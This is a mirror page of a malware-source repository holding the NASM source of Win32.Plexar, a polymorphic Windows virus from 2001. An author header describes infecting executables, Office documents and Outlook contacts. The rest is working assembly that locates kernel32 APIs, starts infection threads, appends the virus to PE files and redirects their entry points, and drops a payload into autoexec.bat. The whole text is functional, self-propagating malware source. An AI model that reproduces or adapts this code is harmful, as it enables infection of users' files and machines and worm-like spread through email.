mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
3193 lines
74 KiB
NASM
3193 lines
74 KiB
NASM
|
||
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
; Ä< Win32.Plexar >Ä
|
||
; Designed by LiteSys in Venezuela, South America
|
||
;
|
||
; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector.
|
||
;
|
||
; Welcome to Plexar, my latest code.
|
||
;
|
||
; It infects PE files by incrementing the last section, I don't overwrite
|
||
; .reloc section, it's preferible to let it alone. In fact, this virus
|
||
; avoids infecting some AV or Win32 files that should never be infected.
|
||
; This is done by CRC32 comparation.
|
||
;
|
||
; Infects Word and Excel documents by dropping (thru VBScript) a macro
|
||
; module-infectant virus in the normal template and personal.xls that is
|
||
; capable of dropping an infected PE file to the Windows directory and then
|
||
; running it.
|
||
;
|
||
; Distributes through Electronic Mail by dropping a VBS worm capable of
|
||
; sending infected droppers to every email address in the Outlook address
|
||
; book. Sorry but I didn't have any time to code a decent MAPI worm =(.
|
||
;
|
||
; The Poly engine is another lame table-driven engine written by me =), no
|
||
; anti-aver intentions were the reason to write that poly engine, just to
|
||
; conceal the code a little. So I think it doesn't desire an explanation
|
||
; because the garbage is very lame.
|
||
;
|
||
; It runs the different routines (word infection, vbs worm, direct action)
|
||
; in different threads. As I always said, I don't optimize my code too much.
|
||
;
|
||
; The payload is very funny and if you're from Venezuela I hope you
|
||
; appreciate it. Consists in dropping a simple com file that displays
|
||
; some silly stuff in spanish, it runs on autoexec.bat but won't display
|
||
; the message until the following rule is complied (this is a very
|
||
; kewl idea I learnt from Byway ;D):
|
||
;
|
||
; If Month <= 7: Day = Month^2 / 3 + 4
|
||
; If Month >= 8: Day = Month^2 / 5 - 4
|
||
;
|
||
; So the payload will run on every month (as a coincidence, the formula
|
||
; pointed to December 24th :P). It's not destructive so don't blame me.
|
||
;
|
||
; This virus has lots of bugs, i've corrected many but still there are a
|
||
; lot. It was tested under Win95 (4.10.1111), Win98 (4.10.1998), WinME and
|
||
; WinNT (4.0/SP4), the virus worked perfectly under those versions. I don't
|
||
; know about Win98 SE and Win2K, since I don't have them installed, I have
|
||
; the CDs here but i'm a lazy ass and my HD space is totally phuken.
|
||
;
|
||
; Virus Size = 12kb. Code not commented. Nor even AVP or Norton (with
|
||
; their "high heuristic" bloodhound shit) flagged the infected PE baits,
|
||
; except from Norton, which flagged the VBS worm.
|
||
;
|
||
; If you need to contact me you can use both mail addresses: litesys@monte.as
|
||
; or liteno2@softhome.net. Rembember, for decent stuff.
|
||
;
|
||
; Patria o Muerte: Venceremos.
|
||
; LiteSys.
|
||
; Venezuela, Julio/Agosto - (c) 2001
|
||
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
|
||
.586
|
||
.MODEL FLAT, STDCALL
|
||
|
||
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
|
||
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
|
||
|
||
EXTRN ExitProcess:PROC
|
||
EXTRN MessageBoxExA:PROC
|
||
|
||
.DATA
|
||
|
||
DEBUG EQU FALSE
|
||
|
||
OFS EQU <OFFSET [EBP]>
|
||
BY EQU <BYTE PTR [EBP]>
|
||
WO EQU <WORD PTR [EBP]>
|
||
DWO EQU <DWORD PTR [EBP]>
|
||
RDTSC EQU <DW 310Fh>
|
||
|
||
APICALL MACRO APIz
|
||
CALL DWORD PTR [APIz + EBP]
|
||
ENDM
|
||
|
||
Numero_Paginas EQU 32h
|
||
K32_W9X EQU 0BFF70000h
|
||
GPA_W9X EQU 0BFF76DACh
|
||
Virus_Tama¤o EQU (Termina_Plexar - Empieza_Plexar)
|
||
|
||
Titulo DB "Plexar."
|
||
DB Virus_Tama¤o / 10000 MOD 10 + 30h
|
||
DB Virus_Tama¤o / 01000 MOD 10 + 30h
|
||
DB Virus_Tama¤o / 00100 MOD 10 + 30h
|
||
DB Virus_Tama¤o / 00010 MOD 10 + 30h
|
||
DB Virus_Tama¤o / 00001 MOD 10 + 30h
|
||
DB 00h
|
||
|
||
Mensaje DB "Plexar (c) 2001 LiteSys "
|
||
DB "-- Activado."
|
||
DB 00h
|
||
|
||
REG_SZ EQU <1>
|
||
HKEY_LOCAL_MACHINE EQU <80000002h>
|
||
|
||
.CODE
|
||
|
||
Empieza_Plexar:
|
||
|
||
CALL @Delta
|
||
@Delta:
|
||
POP EAX
|
||
XCHG EBP, EAX
|
||
SUB EBP, OFFSET @Delta
|
||
|
||
JMP @@1
|
||
DB 00h, 00h, "[PLEXAR]", 00h, 00h
|
||
@@1:
|
||
|
||
CALL @SEH_1
|
||
|
||
MOV ESP, DWORD PTR [ESP+8h]
|
||
JMP @FueraHost
|
||
|
||
@SEH_1:
|
||
|
||
XOR EAX, EAX
|
||
PUSH DWORD PTR FS:[EAX]
|
||
MOV FS:[EAX], ESP
|
||
|
||
MOV EDI, DWORD PTR [ESP+8h]
|
||
CALL Busca_K32
|
||
CALL Busca_GPA
|
||
|
||
LEA ESI, OFS [CreateFileA]
|
||
LEA EDI, OFS [APIs_K32]
|
||
MOV EBX, DWO [KERNEL32]
|
||
CALL Busca_APIs
|
||
|
||
LEA EDX, OFS [RewtDir]
|
||
PUSH EDX
|
||
PUSH MAX_PATH
|
||
APICALL GetCurrentDirectoryA
|
||
OR EAX, EAX
|
||
JZ @FueraHost
|
||
|
||
IF DEBUG
|
||
|
||
PUSH EBP
|
||
CALL Directa
|
||
|
||
PUSH EBP
|
||
CALL Worm_VBS
|
||
|
||
PUSH EBP
|
||
CALL Infecta_Word
|
||
|
||
JMP @FueraHost
|
||
|
||
ELSE
|
||
|
||
CALL Thread
|
||
|
||
ENDIF
|
||
|
||
CALL Er_Pailon
|
||
|
||
@FueraHost:
|
||
|
||
XOR ECX, ECX
|
||
POP DWORD PTR FS:[ECX]
|
||
POP ECX
|
||
|
||
PUSH 12345678h
|
||
ORG $-4
|
||
HostBack DD OFFSET Mentira
|
||
RET
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; El Thread Principal, carga los otros threads.
|
||
|
||
Thread PROC
|
||
PUSHAD
|
||
|
||
AND BY [Listo_Directa], 00h
|
||
|
||
XOR EAX, EAX
|
||
LEA EBX, OFS [Thread_Directa]
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH EBP
|
||
LEA EBX, OFS [Directa]
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH EAX
|
||
APICALL CreateThread
|
||
MOV DWO [Thread_Directa], EAX
|
||
OR EAX, EAX
|
||
JZ @FinThread
|
||
|
||
PUSH 02h
|
||
PUSH EAX
|
||
APICALL SetThreadPriority
|
||
|
||
@RevDirect:
|
||
PUSH -1
|
||
PUSH DWO [Thread_Directa]
|
||
APICALL WaitForSingleObject
|
||
|
||
CMP BY [Listo_Directa], 01h
|
||
JNZ @RevDirect
|
||
|
||
XOR EAX, EAX
|
||
LEA EBX, OFS [Thread_WormVBS]
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH EBP
|
||
LEA EBX, OFS [Worm_VBS]
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH EAX
|
||
APICALL CreateThread
|
||
MOV DWO [Thread_WormVBS], EAX
|
||
OR EAX, EAX
|
||
JZ @FinThread
|
||
|
||
PUSH 02h
|
||
PUSH EAX
|
||
APICALL SetThreadPriority
|
||
|
||
XOR EAX, EAX
|
||
LEA EBX, OFS [Thread_IWord]
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH EBP
|
||
LEA EBX, OFS [Infecta_Word]
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH EAX
|
||
APICALL CreateThread
|
||
MOV DWO [Thread_IWord], EAX
|
||
OR EAX, EAX
|
||
JZ @FinThread
|
||
|
||
PUSH 02h
|
||
PUSH EAX
|
||
APICALL SetThreadPriority
|
||
|
||
PUSH -1
|
||
PUSH TRUE
|
||
LEA EAX, OFS [Thread_WormVBS]
|
||
PUSH EAX
|
||
PUSH 02h
|
||
APICALL WaitForMultipleObjects
|
||
|
||
@FinThread:
|
||
|
||
POPAD
|
||
RET
|
||
|
||
Thread ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Payload.
|
||
|
||
Er_Pailon PROC
|
||
PUSHAD
|
||
|
||
CDQ
|
||
PUSH EDX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH CREATE_NEW
|
||
PUSH EDX
|
||
PUSH EDX
|
||
PUSH GENERIC_WRITE
|
||
LEA EAX, OFS [CocoFrio]
|
||
PUSH EAX
|
||
APICALL CreateFileA
|
||
MOV DWO [PFHandle], EAX
|
||
INC EAX
|
||
JZ @P_Fin
|
||
DEC EAX
|
||
XCHG EBX, EAX
|
||
|
||
XOR EDX, EDX
|
||
PUSH EDX
|
||
LEA EAX, OFS [PTemporal]
|
||
PUSH EAX
|
||
PUSH Largo_PProg
|
||
LEA EAX, OFS [Payload_Prog]
|
||
PUSH EAX
|
||
PUSH EBX
|
||
APICALL WriteFile
|
||
OR EAX, EAX
|
||
JZ @P_Fin
|
||
|
||
PUSH DWO [PFHandle]
|
||
APICALL CloseHandle
|
||
|
||
CDQ
|
||
PUSH EDX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH OPEN_EXISTING
|
||
PUSH EDX
|
||
PUSH EDX
|
||
PUSH GENERIC_WRITE
|
||
LEA EAX, OFS [AutoExec]
|
||
PUSH EAX
|
||
APICALL CreateFileA
|
||
MOV DWO [PFHandle], EAX
|
||
INC EAX
|
||
JZ @P_Fin
|
||
DEC EAX
|
||
|
||
CDQ
|
||
PUSH 00000002h
|
||
PUSH EDX
|
||
PUSH EDX
|
||
PUSH EAX
|
||
APICALL SetFilePointer
|
||
|
||
CDQ
|
||
PUSH EDX
|
||
LEA EAX, OFS [PTemporal]
|
||
PUSH EAX
|
||
PUSH Largo_CocoFrio-1
|
||
LEA EAX, OFS [CocoFrio]
|
||
PUSH EAX
|
||
PUSH DWO [PFHandle]
|
||
APICALL WriteFile
|
||
OR EAX, EAX
|
||
JZ @P_Fin
|
||
|
||
PUSH DWO [PFHandle]
|
||
APICALL CloseHandle
|
||
|
||
@P_Fin:
|
||
|
||
POPAD
|
||
RET
|
||
Er_Pailon ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Proceso para buscar la base de KERNEL32
|
||
|
||
Busca_K32 PROC
|
||
|
||
AND EDI, 0FFFF0000h
|
||
PUSH Numero_Paginas
|
||
POP ECX
|
||
|
||
@Compara_K32:
|
||
|
||
PUSH EDI
|
||
|
||
MOV BX, WORD PTR [EDI]
|
||
OR BX, 03D5Bh ; 5A4D || 3D5B == 7F5F
|
||
SUB BX, 07F5Fh
|
||
JNZ @Incrementa_K32
|
||
|
||
ADD EDI, [EDI+3Ch]
|
||
MOV BX, WORD PTR [EDI] ; 4550 && C443 == 4440
|
||
AND BX, 0C443h
|
||
XOR BX, 04440h
|
||
JE @EnK32
|
||
|
||
@Incrementa_K32:
|
||
|
||
POP EDI
|
||
|
||
SUB EDI, 10000h
|
||
LOOP @Compara_K32
|
||
|
||
PUSH K32_W9X
|
||
|
||
@EnK32:
|
||
|
||
POP DWO [KERNEL32]
|
||
RET
|
||
|
||
Busca_K32 ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
DB 5 DUP (90h)
|
||
|
||
; Proceso para buscar a GetProcAddress
|
||
|
||
Busca_GPA PROC
|
||
|
||
MOV EBX, DWO [KERNEL32]
|
||
MOV EDI, EBX
|
||
|
||
ADD EDI, DWORD PTR [EDI+3Ch]
|
||
MOV EDI, DWORD PTR [EDI+78h]
|
||
ADD EDI, EBX
|
||
MOV DWO [Exports], EDI
|
||
|
||
MOV ECX, DWORD PTR [EDI+18h]
|
||
DEC ECX
|
||
|
||
MOV EDI, DWORD PTR [EDI+20h]
|
||
ADD EDI, EBX
|
||
|
||
XOR EAX, EAX
|
||
|
||
@BGPA_1:
|
||
|
||
MOV ESI, DWORD PTR [EDI]
|
||
ADD ESI, EBX
|
||
PUSH EDI
|
||
|
||
PUSH l_GetProcAddress
|
||
POP EDI
|
||
PUSHAD
|
||
CALL CRC32
|
||
CMP EAX, CRC32_GetProcAddress
|
||
POPAD
|
||
POP EDI
|
||
JE @BGPA_2
|
||
|
||
INC EAX
|
||
ADD EDI, 4h
|
||
|
||
LOOP @BGPA_1
|
||
|
||
PUSH GPA_W9X
|
||
|
||
JMP @BGPA_3
|
||
|
||
@BGPA_2:
|
||
|
||
MOV ESI, DWO [Exports]
|
||
ADD EAX, EAX
|
||
|
||
MOV EDI, DWORD PTR [ESI+24h]
|
||
ADD EDI, EBX
|
||
ADD EDI, EAX
|
||
|
||
MOVZX EAX, WORD PTR [EDI]
|
||
IMUL EAX, 4h
|
||
|
||
MOV EDI, DWORD PTR [ESI+1Ch]
|
||
ADD EDI, EBX
|
||
ADD EDI, EAX
|
||
|
||
MOV EAX, DWORD PTR [EDI]
|
||
ADD EAX, EBX
|
||
|
||
PUSH EAX
|
||
|
||
@BGPA_3:
|
||
|
||
POP DWO [GetProcAddress]
|
||
|
||
RET
|
||
|
||
Busca_GPA ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; ESI -> Donde Guardar las APIs
|
||
; EDI -> Cadenas de APIs
|
||
; EBX -> Modulo
|
||
|
||
; Proceso para buscar las APIs
|
||
|
||
Busca_APIs PROC
|
||
|
||
PUSHAD
|
||
|
||
MOV DWO [Guardalo], ESI
|
||
XCHG EDI, ESI
|
||
|
||
@BA1:
|
||
LEA EDI, OFS [TempAPI]
|
||
@BA2:
|
||
|
||
CMP BYTE PTR [ESI], 00h
|
||
JE @BA4
|
||
|
||
LODSB
|
||
CMP AL, 0Eh
|
||
JA @BA3
|
||
|
||
XOR ECX, ECX
|
||
XCHG CL, AL
|
||
|
||
PUSH ESI
|
||
LEA ESI, OFS [PackedAPIs]
|
||
|
||
@BA5:
|
||
INC ESI
|
||
CMP BYTE PTR [ESI], 00h
|
||
JNZ @BA5
|
||
|
||
LOOP @BA5
|
||
|
||
INC ESI
|
||
@BA6:
|
||
MOVSB
|
||
CMP BYTE PTR [ESI], 00h
|
||
JNZ @BA6
|
||
|
||
POP ESI
|
||
JMP @BA2
|
||
|
||
@BA3:
|
||
STOSB
|
||
JMP @BA2
|
||
|
||
@BA4:
|
||
|
||
XOR AL, AL
|
||
STOSB
|
||
|
||
LEA EAX, OFS [TempAPI]
|
||
PUSH EAX
|
||
PUSH EBX
|
||
CALL [GetProcAddress+EBP]
|
||
NOP
|
||
|
||
PUSH ESI
|
||
MOV ESI, 12345678h
|
||
ORG $-4
|
||
Guardalo DD 00000000h
|
||
MOV DWORD PTR [ESI], EAX
|
||
ADD DWO [Guardalo], 00000004h
|
||
POP ESI
|
||
|
||
INC ESI
|
||
|
||
CMP BYTE PTR [ESI], 0FFh
|
||
JNZ @BA1
|
||
|
||
@OA7:
|
||
|
||
POPAD
|
||
|
||
RET
|
||
|
||
Busca_APIs ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Accion directa.
|
||
|
||
Directa PROC Pascal DeltaOfs:DWORD
|
||
|
||
PUSHAD
|
||
|
||
MOV EBP, DeltaOfs
|
||
|
||
CALL @SEH_2
|
||
|
||
MOV ESP, DWORD PTR [ESP+8h]
|
||
JMP @DIRF
|
||
|
||
@SEH_2:
|
||
|
||
XOR EAX, EAX
|
||
PUSH DWORD PTR FS:[EAX]
|
||
MOV FS:[EAX], ESP
|
||
|
||
LEA EDX, OFS [RewtDir]
|
||
PUSH EDX
|
||
APICALL SetCurrentDirectoryA
|
||
OR EAX, EAX
|
||
JZ @DIRF
|
||
|
||
@DIR1:
|
||
|
||
LEA EAX, OFS [Busqueda]
|
||
PUSH EAX
|
||
LEA EAX, OFS [Mascara]
|
||
PUSH EAX
|
||
APICALL FindFirstFileA
|
||
MOV DWO [BHandle], EAX
|
||
INC EAX
|
||
JZ @DIR2
|
||
|
||
@DIR3:
|
||
|
||
LEA EDI, OFS [Busqueda.wfd_szFileName]
|
||
MOV EBX, EDI
|
||
PUSH EBX
|
||
XOR AL, AL
|
||
SCASB
|
||
JNZ $-1
|
||
XCHG ESI, EDI
|
||
SUB ESI, 5h
|
||
OR DWORD PTR [ESI], 20202020h
|
||
MOV EDI, 5h
|
||
CALL CRC32
|
||
POP EBX
|
||
CMP EAX, CRC_EXE ; .exe crc32
|
||
JE @Infecta_Este_Exe
|
||
CMP EAX, CRC_SCR ; .scr crc32
|
||
JE @Infecta_Este_Exe
|
||
|
||
@Retorna_Directa:
|
||
|
||
LEA EAX, OFS [Busqueda]
|
||
PUSH EAX
|
||
PUSH DWO [BHandle]
|
||
APICALL FindNextFileA
|
||
OR EAX, EAX
|
||
JNZ @DIR3
|
||
|
||
PUSH DWO [BHandle]
|
||
APICALL FindClose
|
||
|
||
@DIR2:
|
||
|
||
LEA EAX, OFS [Puto_Puto]
|
||
PUSH EAX
|
||
APICALL SetCurrentDirectoryA
|
||
|
||
LEA EAX, OFS [Busqueda.wfd_szFileName]
|
||
PUSH EAX
|
||
PUSH MAX_PATH
|
||
APICALL GetCurrentDirectoryA
|
||
CMP EAX, DWO [LargPP]
|
||
JZ @DIRF
|
||
MOV DWO [LargPP], EAX
|
||
JMP @DIR1
|
||
|
||
LEA EAX, OFS [RewtDir]
|
||
PUSH EAX
|
||
APICALL SetCurrentDirectoryA
|
||
|
||
@DIRF:
|
||
|
||
XOR ECX, ECX
|
||
POP DWORD PTR FS:[ECX]
|
||
POP ECX
|
||
|
||
IF DEBUG
|
||
|
||
POPAD
|
||
RET
|
||
|
||
ELSE
|
||
|
||
INC BY [Listo_Directa]
|
||
|
||
MOV DWO [GuardaEBP], EBP
|
||
POPAD
|
||
|
||
MOV EBX, 12345678h
|
||
ORG $-4
|
||
GuardaEBP DD 00000000h
|
||
|
||
PUSH NULL
|
||
CALL [EBX+ExitThread]
|
||
|
||
RET
|
||
|
||
ENDIF
|
||
|
||
@Infecta_Este_Exe:
|
||
CALL Infecta_PE
|
||
JMP @Retorna_Directa
|
||
|
||
Directa ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Proceso para infectar un PE.
|
||
;
|
||
; EBX -> Archivo a infectar
|
||
|
||
Infecta_PE PROC
|
||
|
||
PUSHAD
|
||
|
||
PUSH DWO [HostBack]
|
||
POP DWO [Guarda_EIP]
|
||
|
||
CALL @Seh_IPE
|
||
|
||
MOV ESP, [ESP+8h]
|
||
JMP @PEF
|
||
|
||
@Seh_IPE:
|
||
|
||
XOR EAX, EAX
|
||
PUSH DWORD PTR FS:[EAX]
|
||
MOV FS:[EAX], ESP
|
||
|
||
PUSH 019d
|
||
POP ECX
|
||
|
||
MOV ESI, EBX
|
||
LEA EDX, OFS [CRCNoInf]
|
||
|
||
@CicloNo:
|
||
|
||
PUSH 04h
|
||
POP EDI
|
||
PUSH EBX
|
||
PUSH ESI
|
||
PUSH EDX
|
||
PUSH ECX
|
||
CALL CRC32
|
||
POP ECX
|
||
POP EDX
|
||
POP ESI
|
||
POP EBX
|
||
CMP EAX, DWORD PTR [EDX]
|
||
JZ @PEF
|
||
ADD EDX, 4h
|
||
LOOP @CicloNo
|
||
|
||
PUSH 00000000h
|
||
PUSH EBX
|
||
APICALL SetFileAttributesA
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH 00000000h
|
||
PUSH OPEN_EXISTING
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH GENERIC_READ + GENERIC_WRITE
|
||
PUSH EBX
|
||
APICALL CreateFileA
|
||
MOV DWO [FHandle], EAX
|
||
INC EAX
|
||
JZ @PEF
|
||
|
||
DEC EAX
|
||
PUSH NULL
|
||
PUSH EAX
|
||
APICALL GetFileSize
|
||
MOV DWO [Tama¤o_1], EAX
|
||
INC EAX
|
||
JZ @PE_Close
|
||
DEC EAX
|
||
|
||
CMP EAX, 8192d
|
||
JB @PE_Close
|
||
|
||
ADD EAX, Virus_Tama¤o + 1400h
|
||
MOV DWO [Tama¤o_2], EAX
|
||
|
||
XOR EDX, EDX
|
||
PUSH EDX
|
||
PUSH EAX
|
||
PUSH EDX
|
||
PUSH PAGE_READWRITE
|
||
PUSH EDX
|
||
PUSH DWO [FHandle]
|
||
APICALL CreateFileMappingA
|
||
MOV DWO [MHandle], EAX
|
||
OR EAX, EAX
|
||
JZ @PE_Close
|
||
|
||
XOR EDX, EDX
|
||
PUSH DWO [Tama¤o_2]
|
||
PUSH EDX
|
||
PUSH EDX
|
||
PUSH FILE_MAP_WRITE
|
||
PUSH EAX
|
||
APICALL MapViewOfFile
|
||
MOV DWO [BaseMap], EAX
|
||
OR EAX, EAX
|
||
JZ @PE_CloseMap
|
||
|
||
MOV EDI, EAX
|
||
MOV BX, WORD PTR [EDI]
|
||
AND BX, 3ED4h ; "ZM" = 5A4Dh ^ 3ED4h == 1444h
|
||
ADD BX, BX
|
||
XOR BX, 3488h
|
||
JNZ @PE_UnMap
|
||
|
||
MOV EBX, DWORD PTR [EDI+3Ch]
|
||
ADD EBX, EDI
|
||
CMP EBX, DWO [BaseMap]
|
||
JB @PE_UnMap
|
||
MOV EDX, DWO [BaseMap]
|
||
ADD EDX, DWO [Tama¤o_1]
|
||
CMP EBX, EDX
|
||
JA @Pe_UnMap
|
||
|
||
ADD EDI, [EDI+3Ch]
|
||
MOV BX, WORD PTR [EDI]
|
||
OR BX, 0AEDAh ; "EP" = 4550h | 0AEDAh == 0EFDAh
|
||
SUB BX, 0EFDAh
|
||
JNZ @PE_UnMap
|
||
|
||
MOV ESI, EDI
|
||
PUSHAD
|
||
ADD ESI, 4Ch
|
||
MOV EDI, 5h
|
||
CALL CRC32
|
||
CMP EAX, CRC_PLXR
|
||
POPAD
|
||
JE @PE_UnMap
|
||
|
||
MOV EAX, "rxlp" XOR 0C3E8F2A8h
|
||
XOR EAX, 0C3E8F2A8h
|
||
MOV DWORD PTR [EDI+4Ch], EAX
|
||
|
||
ADD ESI, 18h
|
||
MOVZX EAX, WORD PTR [EDI+14h]
|
||
ADD ESI, EAX
|
||
|
||
XOR EDX, EDX
|
||
MOVZX EDX, WORD PTR [EDI+06h]
|
||
DEC EDX
|
||
IMUL EDX, 28h
|
||
ADD ESI, EDX
|
||
|
||
OR DWORD PTR [ESI+24h], 0A0000020h
|
||
|
||
MOV EAX, DWORD PTR [ESI+08h]
|
||
PUSH EAX
|
||
ADD EAX, Virus_Tama¤o + 400h
|
||
MOV DWORD PTR [ESI+08h], EAX
|
||
|
||
MOV EBX, DWORD PTR [EDI+3Ch]
|
||
XOR EDX, EDX
|
||
DIV EBX
|
||
INC EAX
|
||
MUL EBX
|
||
|
||
MOV DWORD PTR [ESI+10h], EAX
|
||
|
||
MOV EAX, DWORD PTR [ESI+10h]
|
||
ADD EAX, DWORD PTR [ESI+0Ch]
|
||
MOV DWORD PTR [EDI+50h], EAX
|
||
|
||
POP EDX
|
||
|
||
MOV EAX, DWORD PTR [EDI+28h]
|
||
ADD EAX, DWORD PTR [EDI+34h]
|
||
MOV DWO [HostBack], EAX
|
||
|
||
ADD EDX, DWORD PTR [ESI+0Ch]
|
||
MOV DWORD PTR [EDI+28h], EDX
|
||
|
||
PUSH EBP
|
||
PUSH EBX
|
||
INC ESP
|
||
|
||
POP EBX ; \
|
||
DEC ESP ; \
|
||
PUSH EBX ; > "[LSX]" Cadena Ejecutable.
|
||
POP EAX ; /
|
||
POP EBP ; /
|
||
|
||
MOV EDI, DWORD PTR [ESI+14h]
|
||
ADD EDI, DWORD PTR [ESI+08h]
|
||
ADD EDI, DWO [BaseMap]
|
||
MOV ECX, Virus_Tama¤o / 4
|
||
SUB EDI, Virus_Tama¤o + 400h
|
||
LEA ESI, OFS [Empieza_Plexar]
|
||
CALL PXPE
|
||
|
||
PUSH DWO [Tama¤o_2]
|
||
POP DWO [Tama¤o_1]
|
||
|
||
@PE_UnMap:
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH DWO [Tama¤o_1]
|
||
PUSH DWO [FHandle]
|
||
APICALL SetFilePointer
|
||
|
||
PUSH DWO [FHandle]
|
||
APICALL SetEndOfFile
|
||
|
||
PUSH DWO [BaseMap]
|
||
APICALL UnmapViewOfFile
|
||
|
||
@PE_CloseMap:
|
||
|
||
PUSH DWO [MHandle]
|
||
APICALL CloseHandle
|
||
|
||
@PE_Close:
|
||
|
||
PUSH DWO [FHandle]
|
||
APICALL CloseHandle
|
||
|
||
@PEF:
|
||
|
||
XOR ECX, ECX
|
||
POP DWORD PTR FS:[ECX]
|
||
POP ECX
|
||
|
||
PUSH DWO [Guarda_EIP]
|
||
POP DWO [HostBack]
|
||
|
||
POPAD
|
||
RET
|
||
|
||
Infecta_PE ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Este proceso suelta en disco un archivo PE vacio.
|
||
;
|
||
; EBX -> Nombre
|
||
|
||
Droppear_PE PROC
|
||
PUSHAD
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH CREATE_ALWAYS
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH GENERIC_READ + GENERIC_WRITE
|
||
PUSH EBX
|
||
APICALL CreateFileA
|
||
MOV DWO [FHandle_DPE], EAX
|
||
INC EAX
|
||
JZ @Fin_DPE
|
||
DEC EAX
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH 32768d
|
||
PUSH EBX
|
||
PUSH PAGE_READWRITE
|
||
PUSH EBX
|
||
PUSH EAX
|
||
APICALL CreateFileMappingA
|
||
MOV DWO [MHandle_DPE], EAX
|
||
OR EAX, EAX
|
||
JZ @DPE_Cierra
|
||
|
||
XOR EBX, EBX
|
||
PUSH 32768d
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH FILE_MAP_WRITE
|
||
PUSH EAX
|
||
APICALL MapViewOfFile
|
||
MOV DWO [BaseMap_DPE], EAX
|
||
OR EAX, EAX
|
||
JZ @DPE_CierraMap
|
||
|
||
PUSH EAX
|
||
LEA EAX, OFS [Dropper]
|
||
PUSH EAX
|
||
CALL _aP_depack_asm
|
||
ADD ESP, 08h
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EAX
|
||
PUSH DWO [FHandle_DPE]
|
||
APICALL SetFilePointer
|
||
|
||
@DPE_DesMapea:
|
||
|
||
PUSH DWO [BaseMap_DPE]
|
||
APICALL UnmapViewOfFile
|
||
|
||
@DPE_CierraMap:
|
||
|
||
PUSH DWO [MHandle_DPE]
|
||
APICALL CloseHandle
|
||
|
||
@DPE_Cierra:
|
||
|
||
PUSH DWO [FHandle_DPE]
|
||
APICALL SetEndOfFile
|
||
|
||
PUSH DWO [FHandle_DPE]
|
||
APICALL CloseHandle
|
||
|
||
